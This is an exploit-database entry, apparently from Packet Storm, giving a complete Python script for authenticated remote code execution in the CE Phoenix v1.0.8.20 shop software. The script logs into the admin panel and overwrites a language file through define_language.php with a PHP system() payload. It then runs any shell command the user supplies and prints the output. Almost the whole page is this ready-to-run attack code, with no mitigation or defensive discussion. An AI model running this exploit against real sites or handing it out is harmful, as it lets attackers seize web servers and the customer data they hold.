Share
## https://sploitus.com/exploit?id=PACKETSTORM:176017
## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)  
#### Date: 2023-11-25  
#### Exploit Author: tmrswrr  
#### Category: Webapps  
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)  
#### Version: v1.0.8.20  
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)  
  
## EXPLOIT :  
  
import requests  
from bs4 import BeautifulSoup  
import sys  
import urllib.parse  
import random  
from time import sleep  
  
class colors:  
OKBLUE = '\033[94m'  
WARNING = '\033[93m'  
FAIL = '\033[91m'  
ENDC = '\033[0m'  
BOLD = '\033[1m'  
UNDERLINE = '\033[4m'  
CBLACK = '\33[30m'  
CRED = '\33[31m'  
CGREEN = '\33[32m'  
CYELLOW = '\33[33m'  
CBLUE = '\33[34m'  
CVIOLET = '\33[35m'  
CBEIGE = '\33[36m'  
CWHITE = '\33[37m'  
  
  
def entry_banner():  
color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,  
colors.CRED, colors.CBEIGE]  
random.shuffle(color_random)  
  
banner = color_random[0] + """  
CE Phoenix v1.0.8.20 - Remote Code Execution \n  
Author: tmrswrr  
"""  
for char in banner:  
print(char, end='')  
sys.stdout.flush()  
sleep(0.0045)  
  
def get_formid_and_cookies(session, url):  
response = session.get(url, allow_redirects=True)  
if response.ok:  
soup = BeautifulSoup(response.text, 'html.parser')  
formid_input = soup.find('input', {'name': 'formid'})  
if formid_input:  
return formid_input['value'], session.cookies  
return None, None  
  
def perform_exploit(session, url, username, password, command):  
print("\n[+] Attempting to exploit the target...")  
  
  
initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"  
formid, cookies = get_formid_and_cookies(session, initial_url)  
if not formid:  
print("[-] Failed to retrieve initial formid.")  
return  
  
# Login  
print("[+] Performing login...")  
login_payload = {  
'formid': formid,  
'username': username,  
'password': password  
}  
login_headers = {  
'Content-Type': 'application/x-www-form-urlencoded',  
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',  
'Referer': initial_url  
}  
login_url = url + "/admin/login.php?action=process"  
login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)  
  
if not login_response.ok:  
print("[-] Login failed.")  
print(login_response.text)  
return  
  
print("[+] Login successful.")  
  
  
new_formid, _ = get_formid_and_cookies(session, login_response.url)  
if not new_formid:  
print("[-] Failed to retrieve new formid after login.")  
return  
  
# Exploit  
print("[+] Executing the exploit...")  
encoded_command = urllib.parse.quote_plus(command)  
exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"  
exploit_headers = {  
'Content-Type': 'application/x-www-form-urlencoded',  
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',  
'Referer': login_response.url  
}  
exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"  
exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)  
  
if exploit_response.ok:  
print("[+] Exploit executed successfully.")  
else:  
print("[-] Exploit failed.")  
print(exploit_response.text)  
  
  
final_response = session.get(url)  
print("\n[+] Executed Command Output:\n")  
print(final_response.text)   
  
def main(base_url, username, password, command):  
print("\n[+] Starting the exploitation process...")  
session = requests.Session()  
perform_exploit(session, base_url, username, password, command)  
  
if __name__ == "__main__":  
entry_banner()  
  
if len(sys.argv) < 5:  
print("Usage: python script.py [URL] [username] [password] [command]")  
sys.exit(1)  
  
base_url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
command = sys.argv[4]  
  
main(base_url, username, password, command)